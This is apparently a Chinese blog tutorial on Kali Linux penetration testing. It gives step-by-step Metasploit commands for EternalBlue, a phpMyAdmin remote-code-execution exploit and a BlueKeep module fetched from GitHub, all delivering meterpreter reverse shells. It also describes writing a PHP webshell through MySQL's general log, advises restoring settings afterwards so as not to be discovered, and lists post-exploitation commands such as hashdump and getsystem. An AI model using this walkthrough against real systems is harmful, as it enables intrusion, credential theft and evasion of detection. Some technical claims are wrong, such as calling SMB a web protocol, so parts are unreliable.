渗透利器-kali工具 (第五章-4) Metasploit漏洞利用模块一

1,永恒之蓝:

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统可以执行任意代码。

SMB:Web协议中的一种,就是Web客户端去访问服务器端的一种协议。

使用MSF实现"永恒之蓝"的快速攻击,就是利用MSF中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。

2,实战漏洞利用:

1.phpAdmin日志写shell:

前提条件:用户是root

思路:

就是利用mysql的一个日志文件,这个日志文件每执行一个sql语句就会将其执行的语言保存。

我们将这个日志文件重命名为shell.php 然后去执行一个sql语句,带有一句话木马的命令。

然后再使用菜刀链接,就可以了。

设置导出文件:

general log    OFF--ON

general log file   设置一个路径,执行sql语句,访问设置的路径即可。

参考文章:

注意:完成测试之后,需要将修改设置的地方,修改回来,以防被发现。

2.MSF获取Get Shell:

实战演示:phpMyAdmin

1.查找模块:earch name:phpmyadmin / search CVE-2018-12611

2.使用模块:use exploit/multi/http/phpmyadmin_lfi_rce

3.查看设置选项:options [rhosts、targeturl、password]

4.设置目标地址:set rhosts 127.0.0.1

5.设置目标范围:set targetrul phpMyAdmin

6.设置密码:set password root

7.选择payload:set payload php/meterpreter/reverse_tcp

8.查看设置选项:options [lhost]

9.设置本机地址:set lhost 127.0.0.2

10.开始攻击:run/exploit

3.永恒之蓝:

使用模块名:

auxiliary/scanner/smb/smb_ms17_010

exploit/windows/smb/ms17_010_eternalblue

1.查找模块:search ms17

2.使用模块:use auxiliary/scanner/smb/smb_ms17_010

3.查看设置选项options[rhosts]

4.设置目标地址:set rhosts 127.0.0.1

5.扫描一下:exploit,出现一个绿色的+号,说明易受攻击

6.使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

7.查看设置选项:options [rhosts]

8.设置目标地址:set rhosts 127.0.0.1

9.设置payload:set payload windows/x64/meterpreter/reverse_tcp [64位的,因为靶机是64位的]

10.查看设置选项:options [lhost]

11.设置本地地址:set lhost 127.0.0.2

12.开始攻击:run

补充:

有的时候,在扫描靶机的时候,不会出现绿色+号

可以使用靶机和kali互相ping一下,看是否能ping通,如果ping不通

可以查看两个机器的ip是否在同一网段,将他们设置为同一个网段,如果还不行,将靶机防火墙关闭,试试。

蓝屏是计算机自动保护系统,存在一定几率出现蓝屏。

4.MSF永恒之蓝[实现蓝屏]:

Kali,MSF中没有这个:cve-2019-0708exploit

需要自己安装:git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce

需要自己配置;

1. 第一步,配置rdp.rb: 存放rdp.rb到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录下

2. 第二步,配置rdp_scanner.rb :存放rdp_scanner.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

3. 第三步,配置cve_2019_0708_bluekeep.rb:存放cve_2019_0708_bluekeep.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

4. 第四步,配置cve_2019_0708_bluekeep_rce.rb:存放cve_2019_0708_bluekeep_rce.rb到/usr/share/metasploit-framework/modules/exploits/windows/rdp ------这里可能没有rdp这个文件夹,如果没有自己创建一个,到这里配置就完成了。

5.需要全部加载一下:reload_all [否则到时候可能读不到模块]

实现步骤:

1.使用辅助模块:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

2.设置目标地址:set rhosts 127.0.0.1

3.检测一下:run 出现绿色 + 号,易受攻击

4.使用攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

5.设置目标地址:set rhosts 127.0.0.1

6.设置端口:set rport 3389

7.查看攻击方式:show targets

8.我这里选择vmware 15 就是4 :set target 4

9.开始攻击:run

5.shell:

了解shell:

连接一般分为正向连接和反向链接:

正向连接:对方服务器开放端口,让我们去访问:

例如使用:telnet 127.0.0.1:80

反向链接:我们开放端口,让对方反问:

也就是让对方来找我们的端口,例如:反弹shell

反弹shell:

reverse shell,端口,被控端发起请求到该端口,并将其命令行的输入就是控制端监听在某TCP/UDP输出到控制端。

为什么要反弹shell:

1.某客户机中了你的网马,但是它在局域网内,你直接访问不了,它的IP会动态改变,你不能持续控制。

2.由于防火墙等限制,对方机器只能发送请求,不能接受请求。

3.对于病毒,木马受害者什么时候能中号,对方网络环境是什么样的,什么时候关机,都是未知,所以建立一个服务端,让而已程序主动连接,才是上策。

4.反弹很好理解:攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

3,MSF会话常用命令:

通过反弹shell获得会话常用命令:

1.文件系统命令:

edit     编辑文件

getlwd    显示本地工作目录

Dir      列出目标文件目录

mkdir     创建目录

2.网络、系统命令:

ipconfig     显示网络接口信息

netstat     显示网络连接信息

execute     执行命令

ps       列出正在运行的进程

sysinfo     获取远程系统给的有关信息,例如os

3.用户界面命令:

getdesktop    获取当前的Meterpreter桌面

screenshot    获取目标桌面屏幕截图

4.提权、密码命令:

getsystem     尝试将你的权限提升为本地系统的权限

hashdump     获取目标NTLM-HASH值

相关推荐
Tree_wws1 分钟前
【集成部署打包】vue3+django集成部署打包成exe 文件
vue.js·python·django·sqlite
抓哇小菜鸡17 分钟前
热部署devtools配置
java·开发语言·devtools
MC皮蛋侠客28 分钟前
sqlalchemy异步方法使用
python·mysql
艾妮艾妮1 小时前
进制的转换
c语言·开发语言·数据结构·python
郝YH是人间理想1 小时前
某名校考研自命题C++程序设计——近10年真题汇总(上)
开发语言·c++·考研
Python涛哥1 小时前
Python高性能web框架-FastApi教程:(1)创建一个简单的FastApi
python·fastapi
曲奇是块小饼干_1 小时前
解决 java.io.NotSerializableException: 对象不支持序列化问题
java·开发语言
颇有几分姿色1 小时前
路由器、二层交换机与三层交换机的区别与应用
网络·智能路由器
深蓝海拓1 小时前
python的脚本、模块与包、目录的关系以及区别
python
m0_748251521 小时前
使用wol-web通过NAS远程唤醒电脑
网络·智能路由器·电脑